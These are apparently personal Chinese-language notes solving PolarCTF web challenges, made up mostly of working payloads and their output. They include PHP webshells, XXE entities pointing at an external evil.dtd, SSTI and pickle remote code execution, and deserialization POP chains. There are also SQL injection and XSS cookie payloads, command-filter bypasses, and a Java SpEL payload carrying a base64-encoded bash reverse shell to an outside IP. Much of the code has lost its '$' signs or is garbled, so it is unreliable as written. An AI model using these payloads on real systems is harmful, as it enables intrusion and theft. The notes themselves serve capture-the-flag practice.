PolarCTF WEB 题解
第一页的WEB题忘记记录笔记了,(零星的还没有整理,第二页开始。。xxe题开始)
swp
100 分 1 Polar币
….
…..
echo ‘{“username”:”admin”}’|base64
eyJ1c2VybmFtZSI6ImFkbWluIn0K
https://github.com/brendan-rius/c-jwt-cracker
https://www.json.cn/jwt
git config –global –unset https.https://github.com.proxy
git config –global –unset http.https://github.com.proxy
git config –global http.https://github.com.proxy http://192.168.1.77:7890
git config –global https.https://github.com.proxy https://192.168.1.77:7890
git config –global http.proxy ‘socks5://192.168.1.77:7890’
git config –global https.proxy ‘socks5://192.168.1.77:7890’
apt-get –reinstall install ca-certificates
update-ca-certificates –fresh
proxychains git clone https://github.com/brendan-rius/c-jwt-cracker.git
git config –global http.sslVersion tlsv1.2
wget https://github.com/brendan-rius/c-jwt-cracker/archive/refs/heads/master.zip
unzip master.zip
cd c-jw*
make
(root?kali)-[/opt/jwt-craker/c-jwt-cracker-master]
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIxIn0.CmpFDAAgLHHSvvnyYLsumJy_Hu8dW7iRwnMTKTekOPI
Secret is “SYSA”
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
https://github.com/PwnFunction/CVE-2021-4034
flag{caf647de0b12baea8774fefc93006fec}
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Host: 127.0.0.1
create_function
create_function(”, $root)ִ
system(%22s\ort%20/flag%22);
function anonymous() {
}system(“s\ort /flag”);
θվ±»º؍
500 ·Ԡ5 Polar±Ѝ
echo F5XDAXZQNZSV6ZRRNZSF63JTF4 |base32 -d
/n0_0ne_f1nd_m3/
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag|data|base|write|input/i",$file)){
echo "I am sorry but no way!";
exit();
}else{
include($file); //imposible.php
}
}
php://filter/resource=http://www.example.com
php://filter/read=string.toupper/resource=xxx.php
php://filter/convert.base64-encode/resource=xxx.php
php://filter/read=string.toupper|string.rot13/resource=xxx.php php://filter/write=string.rot13/resource=example.txt”,”Hello World
php://filter/read=string.rot13/resource=hello.php
php://filter/string.rot13/resource=imposible.php
?text=php://input&file=php://filter/read=string.rot13/resource=imposible.php
?text=php://input&file=php://filter/read=string.rot13/resource=imposible.php
POST:welcome to the 504sys
?text=data://text/plain,welcome to the 504sys&file=php://filter/read=string.rot13/resource=imposible.php
http://www.hiencode.com/rot13.html
?file=php://filter/convert.base64-encode/resource=…/./…/./…/./…/./flag
…..
xxe
300 分 3 Polar币
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM=file:////var/www/html/flagggg.php">}>
<root>
<name=&xxe;</name>
</root>
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php
<!DOCTYPE root [<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/flagggg.php">]>
<root>&file;</root>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>
SSTI
300 分 3 Polar币
?name={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /flag').read()}}{%endif%}{%endfor%}
flask_pin
500 分 5 Polar币
/sys/class/net/eth0/address
/etc/machine-id
/proc/sys/kernel/random/boot_id
机器码好像不行,暂时放一放,待更新。
unpickle
300 分 3 Polar币
cookie user
generate value :
import pickle
import base64
import requests
class RCE:
def __reduce__(self):
return eval, ("open('/flag','r').read()",)
# return eval, (f"__import__('pickle').loads({f})",)
a = RCE()
payload = base64.b64encode(pickle.dumps(a))
print(base64.b64decode(payload))
pickle.loads(base64.b64decode(payload).replace(b'os', b'').replace(b'reduce', b'').replace(b'system', b'').replace(b'env', b'').replace(b'flag', b''))
print(payload)
签到
100 分 1 Polar币
删除submit disabled项
session文件包含
100 分 1 Polar币
看代码,找漏洞
?file=php://filter/convert.base64-encode/resource=action.php
POST: name=<?php @eval(_POST['cmd']);?>
?file=/tmp/sess_tue09ggom8bkshcqrjrb0lm3t6
POST: name=<?php @eval(_POST['cmd']);?>
POST: name=<?php system('ls /');?>
POST: name=<?php system('cat /flaggggg ');?>
cmd=system("cat /flaggggg |base64");
因为没有换行,只有回车,所以普通的显示时显示不出来,被回车回前面了。
POST: name=<?php echo 'aa';@eval($_POST['cmd']);?>
Don’t touch me
100 分 1 Polar币
扫描目录发现 2.php 3.php
2.php按钮可以修改为enable
3.php 中注释发现 fla.php
veryphp
500 分 5 Polar币
-a9<b>>{4}DDabcphp@Rs
shaw[root=-a?<b>rrrrr>>>>>RabcRphphp@Rr
-a?<b>rrrrr>>>>>RabcRphphp@Rr
shaw root=-a?<b>rrrrr>>>>RabcRphphp@Rrr&ans=21475&my[ans=qwq::oao
shaw[root=-a?rrrrr>>>>RabcRphphp@Rrr
if(preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r)./',shaw_root)&& strlen($shaw_root)===29){
-a9<b>rrrrr>>>>RabcRphphp@Rrr
构造字符和网上的通过的也过不去!!!
BlackMagic
300 分 3 Polar币
strTmp= xxxxx…xxxxx
反序列化
300 分 3 Polar币
https://www.bejson.com/runcode/php/
unserialize
class example{
public handle;
function __construct(){this->handle = new process();
}
}
class process{
public pid;
function __construct(){this->pid = "phpinfo();";
}
}
test = new example();
echo serialize(test);//打印payload
?>
O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:10:"phpinfo();";}}
O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:15:"system('ls /');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:15:"system('ls /');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:14:"system('env');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:17:"system('whoami');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:21:"system('echo $FLAG');";}}
#以下环境变量中取,提交不对
flag{4388f834-8723-4bca-b8c1-6fd53cd47b55}
flag错误,请检查仔细后提交。
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:27:"system('ls /var/www/html');";}}
flag.php index.php
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:37:"system('cat /var/www/html/flag.php');";}}
输出注释中有flag..
毒鸡汤
500 分 5 Polar币
扫描目录
robots.txt –> hint.txt
www.zip
?readfile=/flag
upload tutu
500 分 5 Polar币
综上他需要两张md5值相同的图
找工具 fastcoll 可生成两个md5值相同的文件
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
照一张图片,我是直接将之前测试的一句话木马换了后缀改成了 test.jpg,然后会生成两个md5值相同个图片,分别上传到两个上传文件的位置得到flag
fastcoll_v1.0.0.5.exe -p D:\download\aaaa\gsl.png -o D:\download\aaaa\md1.png D:\download\aaaa\md2.png
Unserialize_Escape
500 分 5 Polar币
“;i:1;s:6:”123456″;}
共20个字符,我们只需要在前面放上20个x变成20个yy。这样就能达成溢出的目的。
xxxxxxxxxxxxxxxxxxxx”;i:1;s:6:”123456″;}
<?php
function filter(string){
return preg_replace('/x/', 'yy',string);
}
username = 'xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}';password = "aaaaa";
user = array(username, password);r = filter(serialize(user));
echor;
echo "\n";
echo unserialize(r);
echo "\n";
echo unserialize(r)[1];
?>
a:2:{i:0;s:40:"yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}
Array
123456
robots
100 分 1 Polar币
/robots.txt
找找shell
300 分 3 Polar币
shell.php
┌──(root㉿kali)-[~]
└─# echo PD9waHAgQGV2YWwoJF9QT1NUWyd1c2FtJ10pOyA/Pg|base64 -d
usam=system(“ls /”);
usam=system(“env”);
WD=/var/www/html FLAG=flag{3f2664f6-b375-4671-b9b4-0fa5b8026d01}
提交通不过
zheshiflag.php
usam=system(“cat zheshiflag.php”);
flag{2591c98b70119fe624898b1e424b5e91} 这个可以
自由的文件上传系统
500 分 5 Polar币
?–> !
不能用有问号的木马
/sectet_include.php?file=upload/5744893807
pass=system(“ls /”);
pass=system(“cat /f1ag_1s_h3R3_And_You_W1LL_n3v3R_F1nd”);
再来ping一波啊
300 分 3 Polar币
?ip=127.0.0.1;echoIFS9PATH
cat index.php
echoIFS$9Y2F0IGluZGV4LnBocA$IFS$9|base64$IFS$9-d|sh
┌──(root㉿kali)-[~]
└─# echo Y2F0IGluZGV4LnBocA|base64 -d
cat index.php
wu
300 分 3 Polar币
a=_=[].[];__='';_=_[''];_=++_;_=++_;_=++_;_=++_;__.=_;_=++_;_=++_;__=_.__;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;_=++_;__.=_;{'_'.__}[_]({'_'.__}[__]);_="";
_[+""]='';_="_"."";_=(_[+""]|"").(_[+""]|"").(_[+""]^"");{'_'._}['_']({'_'._}['__']);_="";_[+""]='';_="_"."";_=(_[+""]|"").(_[+""]|"").(_[+""]^"");{'_'._}['_']({'_'._}['__']);_++; //_=1__=("#" ^ "|"); // _
__.=("." ^ "~"); //_P // .为拼接字符__.=("/" ^ "`"); //_PO
__.=("|" ^ "/"); //_POS__.=("{" ^ "/"); //_POST
{__}[!_]({__}[_]);
//_POST[0](_POST[1]);
_++;__=("#" ^ "|");__.=("." ^ "~");__.=("/" ^ "`");__.=("|" ^ "/");__.=("{" ^ "/");{__}[!_]({__}[_]);
0=assert&1=phpinfo();
0=eval&1=phpinfo();
还是不行
php very nice
100 分 1 Polar币
https://www.bejson.com/runcode/php/#google_vignette
sys = “phpinfo();”;
}
function __destruct(){
eval(this->sys);
}
}test = new example();
echo serialize($test); //打印payload
?>
O:7:”example”:1:{s:3:”sys”;s:10:”phpinfo();”;}phpinfo()
O:7:”example”:1:{s:3:”sys”;s:13:”system(‘ls’);”;}
?a=O:7:”example”:1:{s:3:”sys”;s:23:”system(‘cat flag.php’);”;}
ezupload
100 分 1 Polar币
mm.gif –> mm.php
<?php eval($_POST["pass"]);?>
pass=system(“cat ../flag.php”);
ezjava
500 分 5 Polar币
【2023秋季个人挑战赛】 flag在/app/flag.txt
/SPEL/vul?ex=S
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,xxxxxxxxxxx}|{base64,-d}|{bash,-i}")
ls
bHMK
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,bHMK}|{base64,-d}|{bash,-i}")
┌──(root㉿kali)-[~]
└─# echo YmFzaCAtaSa+JiAvZGV2L3RjcC8zOS4xMdcuMTEzLjI1MC85MDAyIDA+JiE=|base64 -d
bash -i&dev/tcp/39.113.250/9002 0>&!
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSa+JiAvZGV2L3RjcC8zOS4xMdcuMTEzLjI1MC85MDAyIDA+JiE=
}|{base64,-d}|{bash,-i}")
?ex=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(),"gbk”)).readLine()
?ex=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(),"gbk")).readLine()
HTTP Status 400 – Bad Request
代码审计1
300 分 3 Polar币
?sys=system&xsx="ls"
?sys=SplFileObject&xsx=php://filter/convert.base64-encode/resource=flag.php
cookie欺骗
100 分 1 Polar币
修改cookie user=admin
upload
100 分 1 Polar币
上传木马, 双写绕过改名,mm.phphpp
干正则
100 分 1 Polar币
?id=a[]%3Dwww.polarctf.com%26a[]%3Dwww.polarctf.com%26a[]%3Dwww.baidu.com&cmd=;ls
?id=a[]%3Dwww.polarctf.com%26a[]%3Dwww.polarctf.com%26a[]%3Dwww.baidu.com&cmd=;ls;cat fla*|base64;
苦海
500 分 5 Polar币
unserialize()
│
└─▶ User::__wakeup()
│
└─▶ User::printName()
│
└─▶ 访问 name (Surrender对象)
│
└─▶ Surrender::__toString()
│
└─▶ 访问file[‘filename’]->content (触发__get)
│
└─▶ FileRobot::__get()
│
└─▶ 调用 path() (触发__invoke)
│
└─▶ FileRobot::__invoke()
│
└─▶ FileRobot::Get_file(‘flag.php’)
“`PHP
<?php
class User {
publicname;
public flag;
}
class Surrender {
privatephone = 110;
public promise;
publicfile; // 动态添加的关键属性
}
class FileRobot {
public filename;
publicpath;
}
// 构造利用链
fileRobot = new FileRobot();fileRobot->filename = '../flag.php'; // 目标文件(上一目录)
fileRobot->path =fileRobot; // 指向自身触发__invoke
surrender = new Surrender();surrender->file = ['filename' => fileRobot]; // 触发FileRobot::__getuser = new User();
user->name =surrender; // 触发Surrender::__toString
// 生成序列化payload
payload = serialize(user);
// URL编码并输出payload
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
// 原始payload(含不可见字符,复制时需注意)
echo "原始Payload:\n";
echopayload;
?>
“`
URL编码后的Payload:
O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A3%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3Bi%3A110%3Bs%3A7%3A%22promise%22%3BN%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3Br%3A6%3B%7D%7D%7Ds%3A4%3A%22flag%22%3BN%3B%7D
原始Payload:
O:4:”User”:2:{s:4:”name”;O:9:”Surrender”:3:{s:16:”Surrenderphone”;i:110;s:7:”promise”;N;s:4:”file”;a:1:{s:8:”filename”;O:9:”FileRobot”:2:{s:8:”filename”;s:11:”../flag.php”;s:4:”path”;r:6;}}}s:4:”flag”;N;}
你想逃也逃不掉
500 分 5 Polar币
a:3:{s:8:”username”;s:10:”aaaaaaaaaaphtmlphtmlphtmlphtml”;s:6:”passwd”;s:12:”bbbbbbbbbbbb”;s:4:”sign”;s:6:”123456″;}
a:3:{s:8:”username”;s:55:”aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4″;s:6:”passwd”;s:58:”bbbbbbbbbbbbphtmlphtmlphtmlphtmlphtmlphtmlphp4php4php4php4″;s:4:”sign”;s:6:”123456″;}
a:3:{s:8:”username”;s:55:”aaaaaaaaaa”;s:6:”passwd”;s:58:”bbbbbbbbbbbbp”;s:4:”sign”;s:6:”123456″;}
user[‘username’] = ‘aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4’;user[‘passwd’] = ‘bbbbbbbbbbbbbbbbbbbbbbbb”:bbbbbp”;s:6:”passwd”;s:5:”123456″;4:”sign”;s:6:”ytyyds”;}cccccc’;
user[‘sign’] = ‘123456’;
a:3:{s:8:”username”;s:55:”aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4″;s:6:”passwd”;s:89:”bbbbbbbbbbbbbbbbbbbbbbbb”:bbbbbp”;s:6:”passwd”;s:5:”123456″;4:”sign”;s:6:”ytyyds”;}cccccc”;s:4:”sign”;s:6:”123456″;}user[‘username’] = ‘aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4’;
user[‘passwd’] = ‘bbbbbbbbbbbbbbbbbbbbbbbb”;s:6:”passwd”;s:6:”123456″;4:”sign”;s:6:”ytyyds”;}cccccc’;user[‘sign’] = ‘123456’;
name=aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4
?passwd=bbbbbbbbbbbbbbbbbbbbbbbb”;s:6:”passwd”;s:0:””;s:4:”sign”;s:6:”ytyyds”;}
user->username=’phtmlphtmlphtmlphtml’;user->passwd=’;s:6:”passwd”;s:0:””;s:4:”sign”;s:6:”ytyyds”;}’;
原始Payload:
a:3:{s:8:”username”;s:20:”phtmlphtmlphtmlphtml”;s:6:”passwd”;s:46:”;s:6:”passwd”;s:0:””;s:4:”sign”;s:6:”ytyyds”;}”;s:4:”sign”;s:6:”123456″;}
a:3:{s:8:”username”;s:20:””;s:6:”passwd”;s:46:”;s:6:”passwd”;s:0:””;s:4:”sign”;s:6:”ytyyds”;}”;s:4:”sign”;s:6:”123456″;}
你的马呢?
300 分 3 Polar币
base64 –> PD9waHAgZXZhbCgkX1BPU1RbInBhc3MiXSk7Pz4
uploads/bas64.jpg
/index.php?file=uploads/bas64.jpg
/index.php?file=php://filter/convert.base64-decode/resource=uploads/bas64.jpg
pass=system(“cat /flag.txt”);
ezphp
300 分 3 Polar币
/robots.txt
/uploads/upload.php
上传png木马
/file/file.php?filename=../uploads/images/mm.png
ome/webuser >ls -ltr
total 4
-rw-r–r– 1 root root 438 Nov 23 2023 flag
/home/webuser >cat flag
随机值
300 分 3 Polar币
<?php
class Index{
private Polar1 = 1;
privatePolar2 = 1;
protected Night = 1;
protectedLight = 1;
function getflag(flag)
{Polar2 = rand(0, 100);
if (this->Polar1 ===this->Polar2) {
Light = rand(0, 100);
if (this->Night === this->Light) {
echoflag;
}
} else {
echo "Your wrong!!!";
}
}
}
a = new Index();
echo urlencode(serialize(a));
echo "\n";
echo serialize($a);
?>
O%3A5%3A%22Index%22%3A4%3A%7Bs%3A13%3A%22%00Index%00Polar1%22%3Bi%3A1%3Bs%3A13%3A%22%00Index%00Polar2%22%3Bi%3A1%3Bs%3A8%3A%22%00%2A%00Night%22%3Bi%3A1%3Bs%3A8%3A%22%00%2A%00Light%22%3Bi%3A1%3B%7D
O:5:”Index”:4:{s:13:”IndexPolar1″;i:1;s:13:”IndexPolar2″;i:1;s:8:”Night”;i:1;s:8:”Light”;i:1;}
safe_include
500 分 5 Polar币
?xxs=
find sessionid
?xxs=/tmp/sess_37iqjv73dcegi3odqe3bqrmi46
pass=system(“ls”);
phpurl
300 分 3 Polar币
urlecode twice:xxs
/index.php?sys=%25%37%38%25%37%38%25%37%33
cool
100 分 1 Polar币
?a=passthru(“cat fla*”);
CB链
500 分 5 Polar币
复杂,构造payload
phar
500 分 5 Polar币
?file=php://filter/convert.base64-encode/resource=funs.php
结果注意如何拷贝齐全,要完整输出里取拷贝
cat 1.txt|base64 -d > 2.txt
发现反序列化漏洞:构造pop链
A::_destruct->B::_tostring->_get
https://www.bejson.com/runcode/php/
<?php
class A
{
public a;
public function __construct()
{this->a=new B();//触发_tostring
}
}
class B
{
public b = array();
public function __construct()
{this->b=array("kfc"=>new C());//触发_get
}
}
class C{
public c = array();
public function __construct()
{this->c=array("vm50"=>"flag");//变量覆盖flag
}
}
A=new A();
echo urlencode(serialize(A));
?>
O%3A1%3A%22A.....
?file=f1@g&data=O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3Ba%3A1%3A%7Bs%3A3%3A%22kfc%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Ba%3A1%3A%7Bs%3A4%3A%22vm50%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D
PHP_Deserialization
500 分 5 Polar币
发现反序列化漏洞:构造pop链
构造链子:
反序列化:提交Payload触发Polar::__wakeup。
反序列化触发:Polar::__wakeup调用night->hacker(night_arg)。
魔术方法调用:Night::__call处理不存在的方法hacker,参数$night_arg是Day对象。
字符串转换:将Day对象转为字符串触发Day::__toString。
文件读取绕过:filename设置为/flflagag,替换后得到/flag,成功读取目标文件。
https://www.bejson.com/runcode/php/
<?php
class Polar {
public night;
publicnight_arg;
}
class Night {}
class Day {
public filename = "/flflagag"; // 关键
}day = new Day();
night = new Night();polar = new Polar();
polar->night =night;
polar->night_arg =day;
serialized = serialize(polar);
payload = base64_encode(serialized);
echo $payload;
?>
polar=Tzo1OiJQb2xhciI6Mjp7czo1OiJuaWdodCI7Tzo1OiJOaWdodCI6MDp7fXM6OToibmlnaHRfYXJnIjtPOjM6IkRheSI6MTp7czo4OiJmaWxlbmFtZSI7czo5OiIvZmxmbGFnYWciO319
PolarOA
500 分 5 Polar币
java Siron 反序列化漏洞
payload构造难
search
300 分 3 Polar币
【2024春季个人挑战赛】
query=1'/**/or/**/1=1#
query=1'/**/uNion/**/Select/**/1,2,3,4,5#
query=1'/**/uNion/**/Select/**/1,group_concat(Flag),3,4,5/**/From/**/Flag#
Fastjson
500 分 5 Polar币
先放一放
file
300 分 3 Polar币
【2024春季个人挑战赛】
dirsearch -u url
upload.php
uploaded
burpsuit 传送木马,文件名更改 png->php
哥斯拉 命令进入,2个假flag,真的在/flag
uploader
100 分 1 Polar币
【2024春季个人挑战赛】
无上传界面
制作界面:
<DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Post DATA POC</title>
</head>
<body>
<form action="http://92214446-57a1-4224-93e2-ea1c7a5a57ce.www.polarctf.com:8090/" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"> <br><br>
<input type="submit" value="提交">
</form>
</body>
</html>
POST / HTTP/1.1
Host: 92214446-57a1-4224-93e2-ea1c7a5a57ce.www.polarctf.com:8090
Content-Length: 231
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryroQOOub0x149mpDK
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
------WebKitFormBoundaryroQOOub0x149mpDK
Content-Disposition: form-data; name="file"; filename="phppass.php"
Content-Type: application/octet-stream
<?php
eval($_POST["pass"]);
?>
------WebKitFormBoundaryroQOOub0x149mpDK--
运行上传木马:
/331d4abb3f3a802c4989ed7737c537ba/phppass.php
pass=system(“cat /flag”);
PlayGame
300 分 3 Polar币
【2024春季个人挑战赛】
https://www.bejson.com/runcode/php/
<?php
class User{
public name;
publicage;
public sex;
}
class PlayGame{
publicuser;
public gameFile="/flag";
}playgame = new PlayGame();
user = new User();user->name = playgame;playgame->user = user;playgame->gameFile = "/flag";
// 生成序列化payload
a = new PlayGame();a->user = new User();
a->user->name = new PlayGame();a->user->name->gameFile='/flag';
payload=serialize(a);
// URL编码并输出payload
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
// 原始payload(含不可见字符,复制时需注意)
echo "原始Payload:\n";
echopayload;
?>
output:
URL编码后的Payload:
O%3A8%3A%22PlayGame%22%3A2%3A%7Bs%3A4%3A%22user%22%3BO%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3BO%3A8%3A%22PlayGame%22%3A2%3A%7Bs%3A4%3A%22user%22%3BN%3Bs%3A8%3A%22gameFile%22%3Bs%3A5%3A%22%2Fflag%22%3B%7Ds%3A3%3A%22age%22%3BN%3Bs%3A3%3A%22sex%22%3BN%3B%7Ds%3A8%3A%22gameFile%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D
原始Payload:
O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:5:"/flag";}
/?polar[flag.flag=O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:5:"/flag";}
覆盖
100 分 1 Polar币
【2024春季个人挑战赛】
注:与“干正则” 几乎一样?
?id=a[]%3Dwww.polarctf.com&cmd=;ls
?id=a[]%3Dwww.polarctf.com&cmd=;ls;cat fla*|base64;
PHP反序列化初试
100 分 1 Polar币
【2024春季个人挑战赛】
生成payload:
https://www.bejson.com/runcode/php/
<?php
class Easy{
public name;
public function __wakeup()
{
echothis->name;
}
}
class Evil{
public evil;
privateenv;
}
evil = new Evil();easy = new Easy();
evil->evil ="ls;cat f1@g.php";easy->name = evil;
// 生成序列化payloadpayload=serialize(easy);
// URL编码并输出payload
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
// 原始payload(含不可见字符,复制时需注意)
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A4%3A%22Easy%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Evil%22%3A2%3A%7Bs%3A4%3A%22evil%22%3Bs%3A15%3A%22ls%3Bcat+f1%40g.php%22%3Bs%3A9%3A%22%00Evil%00env%22%3BN%3B%7D%7D
原始Payload:
O:4:"Easy":1:{s:4:"name";O:4:"Evil":2:{s:4:"evil";s:15:"ls;cat f1@g.php";s:9:"Evilenv";N;}}
payload要用url编码的,原始的可能不全。
ls
f1@g.php index.php
机器人
100 分 1 Polar币
【2024春季个人挑战赛】
前半flag:
/robots.txt
dirsearch -u url/27f5e15b6af3223f1176293cd015771d
后半flag:
/27f5e15b6af3223f1176293cd015771d/flag.php
csdn
300 分 3 Polar币
【2024春季个人挑战赛】
?xxs=file://flag/flag.txt
PolarOA2.0
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
CC链
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
FastJsonBCEL
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
ezJson
500 分 5 Polar币
【2024夏季个人挑战赛】
fastJson反序列化
放i放先。
Dragon
300 分 3 Polar币
flag在cookies里
tnl
300 分 3 Polar币
【2024夏季个人挑战赛】
twothree=php://filter/convert.base64-encode/resource=index
twothree=php://filter/convert.base64-encode/index/resource=flag
你知道sys还能这样玩吗
300 分 3 Polar币
【2024夏季个人挑战赛】
/sys.php
过滤如何绕过:
$cmd = $_POST['cmd'];
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
$output = system($cmd);
echo $output;
}
引号和圆括号没有过滤:
└─# echo "ls"|hex
6c730a
cmd=php -r 'system(hex2bin("6c73"));'
└─# echo "cat /flag.txt"|hex
636174202f666c61672e7478740a
cmd=php -r 'system(hex2bin("636174202f666c61672e7478740a"));'
扫扫看
100 分 1 Polar币
【2024夏季个人挑战赛】
dirsearch -u url
/flag.php
查看输出
debudao
100 分 1 Polar币
【2024夏季个人挑战赛】
<script>alert("aa")</script>
<script>alert(document.cookie)</script>
审计
100 分 1 Polar币
【2024夏季个人挑战赛】
https://blog.csdn.net/2301_81684021/article/details/144907940
//数字
240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412
找其他开头的:
<?php
function findMD5Collision(prefix) {
// 循环尝试不同的字符串
for (i = 0; ii++) {
// 生成一个候选字符串
candidate =prefix . i;
// 计算 MD5 哈希值md5 = md5(candidate);
// 检查哈希值是否符合要求
if (preg_match("/^0e[0-9]{30}/", md5)) {
echocandidate;
return candidate; // 返回符合条件的字符串
}
}
return false; // 如果没有找到,则返回 false
}prefix = "ailx10"; // 我们希望字符串以 "ailx10" 为前缀
string = findMD5Collision(prefix);
if (string !== false) {
echo "找到的字符串: " .string . "\n";
echo "MD5 哈希值: " . md5($string) . "\n";
} else {
echo "未找到符合条件的字符串。\n";
}
?>
ExX?
300 分 3 Polar币
